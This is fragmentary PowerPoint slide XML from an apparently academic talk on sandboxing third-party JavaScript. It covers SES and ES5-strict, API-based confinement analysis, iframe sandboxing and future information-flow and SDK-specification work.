              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2353" dirty="0" smtClean="0"/>
              <a:t>Lack of lexical scoping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="2" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2353" dirty="0" smtClean="0"/>
              <a:t>Lack of closure-based encapsulation (in implementations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="2" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2353" dirty="0" smtClean="0"/>
              <a:t>Ambient access to the global object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="2" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2353" dirty="0" smtClean="0"/>
              <a:t>Mutable built-in state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649224" lvl="2" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2353" dirty="0" smtClean="0"/>
              <a:t>Dynamic code generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2811" dirty="0" smtClean="0"/>
              <a:t>ES3 subsets use filtering and rewriting to achieve security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2811" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ES5-strict gets rid of the first three issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2811" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SES gets rid of ALL of these issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="774954" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2411" dirty="0" smtClean="0"/>
              <a:t>currently under proposal by the ECMA committee (TC39) for adoption within future version of JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2811" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2811" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill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763000" cy="4952999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="365760" indent="-365760">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>API + Language-Based Sandboxing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Promising approach for enforcing fine-grained access-control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>sandbox needs to be designed only once</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>policies can be varied by modifying the API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security can be guaranteed by ONLY analyzing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sandbox and API implementations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Out of scope:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> information-flow control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>may require analysis of untrusted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>much harder problem!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464"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220200" cy="5486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9000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Semantics of JavaScript:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LambdaJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3750" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3750" dirty="0" err="1" smtClean="0"/>
              <a:t>Guha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3750" dirty="0" smtClean="0"/>
              <a:t> et al., 2010]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" smtClean="0"/>
              <a:t>core calculus + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1" smtClean="0"/>
              <a:t>desugaring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" smtClean="0"/>
              <a:t> function, much more “manageable” semantics, but surface language properties have to be translated into the calculus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>JavaScript program analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1">
              <a:lnSpc>
                <a:spcPct val="109000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gatekeeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Guarnieri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> et al., 2009]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>: points-to analysis like ours, no confinement analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1">
              <a:lnSpc>
                <a:spcPct val="109000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>VEX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Bandhakavi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> et al., 2010]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>, Kudzu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1" smtClean="0"/>
              <a:t>Saxena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t> et al., 2010]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" err="1" smtClean="0"/>
              <a:t>Progam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t> logic for JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>[Smith et al., 2012]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750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en-US" sz="5500" dirty="0" smtClean="0"/>
              <a:t>Language-based sandboxing (long history)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1">
              <a:lnSpc>
                <a:spcPct val="109000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>Proof Carrying Code, Software Fault Isolation,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" err="1" smtClean="0"/>
              <a:t>Inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t> Run-time Monitoring, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1">
              <a:lnSpc>
                <a:spcPct val="109000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4750" u="sng" dirty="0" smtClean="0"/>
              <a:t>Our contribution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>: apply ideas from the above to JavaScript (tackle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>, reflection), automatically analyze confinement properties of JavaScript APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="170000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5500" dirty="0" smtClean="0"/>
              <a:t>Browser-based mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1">
              <a:lnSpc>
                <a:spcPct val="109000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>Content security policy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" err="1" smtClean="0"/>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>), sandboxed IFrames (Chrome): get rid of most of the downsides of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" err="1" smtClean="0"/>
              <a:t>IFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4750" dirty="0" smtClean="0"/>
              <a:t>-based sandboxing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" lvl="1">
              <a:lnSpc>
                <a:spcPct val="109000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="475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Browser-Based Sandboxing: IFRAMES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7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486400" y="3886200"/>
            <a:ext cx="1371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Hosting page server</a:t>
            </a:r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" y="4399226"/>
            <a:ext cx="9067800" cy="189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7472">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>However, IFrames may NOT be the preferred option (especially back in 2008)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restricts content to a confined region of the screen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hosting page is still vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, frame navigation, CSRF, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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performance penalty in exposing a library across frame boundary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-283464">
              <a:lnSpc>
                <a:spcPct val="12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Analogy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> Process-based Isolation in operating systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1371600"/>
            <a:ext cx="3886200" cy="297939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04672" y="1472184"/>
            <a:ext cx="2445075" cy="1753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44252" y="2861846"/>
            <a:ext cx="148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Hosting page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Down Arrow 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4727750" y="-97929"/>
            <a:ext cx="331095" cy="438660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5833" y="1548824"/>
            <a:ext cx="792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IFrame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301033" y="1853624"/>
            <a:ext cx="1365967" cy="521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Third-party code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01033" y="1853624"/>
            <a:ext cx="1365967" cy="521273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6" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1981200" y="2409097"/>
            <a:ext cx="762000" cy="486503"/>
            <a:chOff x="1634607" y="2563704"/>
            <a:chExt cx="851726" cy="509411"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="Straight Arrow Connector 57"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1634607" y="2611383"/>
              <a:ext cx="651393" cy="436616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769806" y="2563704"/>
              <a:ext cx="716527" cy="509411"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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prstDash val="dash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ounded Rectangular Callout 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3200400"/>
            <a:ext cx="3429000" cy="969915"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -1907"/>
              <a:gd name="adj2" fmla="val -10318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00"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PostMessage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API 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(2009 onwards)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-18288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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Rich abstractions can be built on top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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DeKeukelaere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1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], [Barth et al.]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 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3429000" y="1167824"/>
            <a:ext cx="1956626" cy="685799"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87364"/>
              <a:gd name="adj2" fmla="val 572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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Separate execution environment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62" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="2971800"/>
            <a:ext cx="15454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Third-party content server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63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4062" y="13716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Down Arrow 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3793536" y="2339412"/>
            <a:ext cx="329624" cy="12896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 animBg="1"/>
      <p:bldP spid="53" grpId="0"/>
      <p:bldP spid="54" grpId="0" animBg="1"/>
      <p:bldP spid="55" grpId="0" animBg="1"/>
      <p:bldP spid="60" grpId="0" animBg="1"/>
      <p:bldP spid="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on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Over the last 4 years:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Standardized) JavaScript has been evolving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>we can enforce fine-grained access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>writing defensive code is easier, static analysis is feasible</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web application privileges have been growing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>HTML5 geo-location, audio-video APIs, browser local storage, …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581400"/>
            <a:ext cx="91440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3464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>In the future:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> 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Enforce information-flow control on third-party JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-283464">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" dirty="0" smtClean="0"/>
              <a:t>does an app flow location data to the internet?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464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Building blocks needed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777240" lvl="1" indent="-365760">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Program analysis techniques for JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="777240" lvl="1" indent="-365760">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Specifications for browser APIs  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-283464"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-283464"/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Future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2438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Program analysis techniques for JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Flow analysis, Symbolic execution frameworks, type systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Begin with SES and then gradually move to arbitrary ES5 and ES3</a:t>
            </a:r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Developing specifications for browser APIs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APIs come with implementation, test suite and English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" y="4191000"/>
            <a:ext cx="9296400" cy="252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83464">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0" smtClean="0"/>
              <a:t>Approach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rgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automatically mine specifications for platforms SDKs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1051560" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" smtClean="0"/>
              <a:t>What global state get side-effected on invoking an SDK method?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1051560" lvl="1" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" dirty="0" smtClean="0"/>
              <a:t>What flows occur between the arguments and return value?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0" smtClean="0"/>
              <a:t>Techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: Dynamic symbolic execution, Dynamic type inference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0" smtClean="0"/>
              <a:t>Related Work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>RubyDust</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Hicks et al.]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, MIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Foster et al.]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, TAUTOKO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Zeller et al.], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>DIAKON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Ernst et al.], …</a:t>
            </a:r>
          </a:p>
          <a:p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5800" y="3200400"/>
            <a:ext cx="8077200" cy="990600"/>
            <a:chOff x="685800" y="3200400"/>
            <a:chExt cx="8077200" cy="990600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685800" y="3860800"/>
              <a:ext cx="2408670" cy="330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Windows8 OS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3530600"/>
              <a:ext cx="2108125" cy="330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Windows8 SDK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200400"/>
              <a:ext cx="579870" cy="33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0200" y="3353012"/>
              <a:ext cx="609600" cy="137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362200" y="3200400"/>
              <a:ext cx="579870" cy="33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34930" y="3860800"/>
              <a:ext cx="2408670" cy="330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Android OS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7330" y="3530600"/>
              <a:ext cx="2108125" cy="330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Android SDK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7330" y="3200400"/>
              <a:ext cx="579870" cy="33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1330" y="3200400"/>
              <a:ext cx="579870" cy="33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54330" y="3860800"/>
              <a:ext cx="2408670" cy="330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Apple </a:t>
              </a:r>
              <a:r>
